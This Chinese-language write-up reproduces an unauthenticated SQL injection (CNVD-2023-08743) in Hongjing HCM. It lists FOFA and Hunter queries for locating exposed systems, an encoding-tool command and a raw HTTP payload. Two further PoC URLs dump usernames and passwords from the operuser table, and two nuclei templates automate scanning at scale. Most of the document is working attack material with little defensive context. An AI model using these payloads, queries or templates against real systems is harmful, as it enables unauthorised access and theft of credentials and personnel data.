宏景HCM SQL注入漏洞复现（CNVD-2023-08743）

漏洞概述

宏景HCM 存在SQL注入漏洞，未经过身份认证的远程攻击者可利用此漏洞执行任意SQL指令，从而窃取数据库敏感信息。

影响范围

宏景HCM<8.2

漏洞复现

fofa语法：FOFA：body='<div class="hj-hy-all-one-logo"'
鹰图语法：app.name="宏景 HCM"
POC：（注入点是categories字段）
/servlet/codesettree?categories=[加密后的恶意sql]&codesetid=1&flag=c&parentid=-1&status=1
注：这里需要对hrms中的sql语句进行编码 
工具地址：https://github.com/vaycore/HrmsTool
java -jar HrmsTool.jar -e "1' union all select 'hongjing',@@version--"

构造payload（查询数据库版本）

GET /servlet/codesettree?categories=~31~27~20union~20all~20select~20~27hongjing~27~2c~40~40version~2d~2d&codesetid=1&flag=c&parentid=-1&status=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

验证POC：

/servlet/codesettree?flag=c&status=1&codesetid=1&parentid=-1&categories=~31~27~20union~20all~20select~20~27~31~27~2cusername~20from~20operuser~20~2d~2d
/servlet/codesettree?flag=c&status=1&codesetid=1&parentid=-1&categories=~31~27~20union~20all~20select~20~27~31~27~2cpassword~20from~20operuser~20~2d~2d

nuclei批量yaml脚本

id: hongjing_HCM_codesettree_sqli
info:
  name: 宏景eHR SQL注入漏洞复现（CNVD-2023-08743）
  author: mhb17
  severity: high
  description: description
  reference:
    - https://
  tags: sqli
requests:
  - raw:
      - |+
        GET /servlet/codesettree?flag=c&status=1&codesetid=1&parentid=-1&categories=~31~27~20union~20all~20select~20~27~31~27~2cusername~20from~20operuser~20~2d~2d HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
        Host: {{Hostname}}
        Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
        Connection: close

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - ' <TreeNode id="1"'
      - type: word
        part: header
        words:
          - 'Content-Type: text/xml'
      - type: word
        part: header
        words:
          - '200'

id: CNVD-2023-08743

info:
  name: Hongjing Human Resource Management System - SQL Injection
  author: SleepingBag945
  severity: critical
  description: There is a SQL injection vulnerability in the categories of Hongjing Human Resource Management System, from which attackers can obtain sensitive database information.
  reference:
    - https://www.henry4e36.top/index.php/archives/162.html
    - https://blog.csdn.net/qq_41904294/article/details/130944159
  metadata:
    max-request: 1
    verified: true
    fofa-query: title="人力资源信息管理系统"
  tags: cnvd,cnvd2023,hongjing,hcm

http:
  - raw:
      - |
        GET /servlet/codesettree?flag=c&status=1&codesetid=1&parentid=-1&categories=~31~27~20union~20all~20select~20~27hongjing~27~2c~40~40version~2d~2d HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(header,"text/xml")'
          - 'contains_all(body,"TreeNode id=\"hongjing","SQL Server")'
        condition: and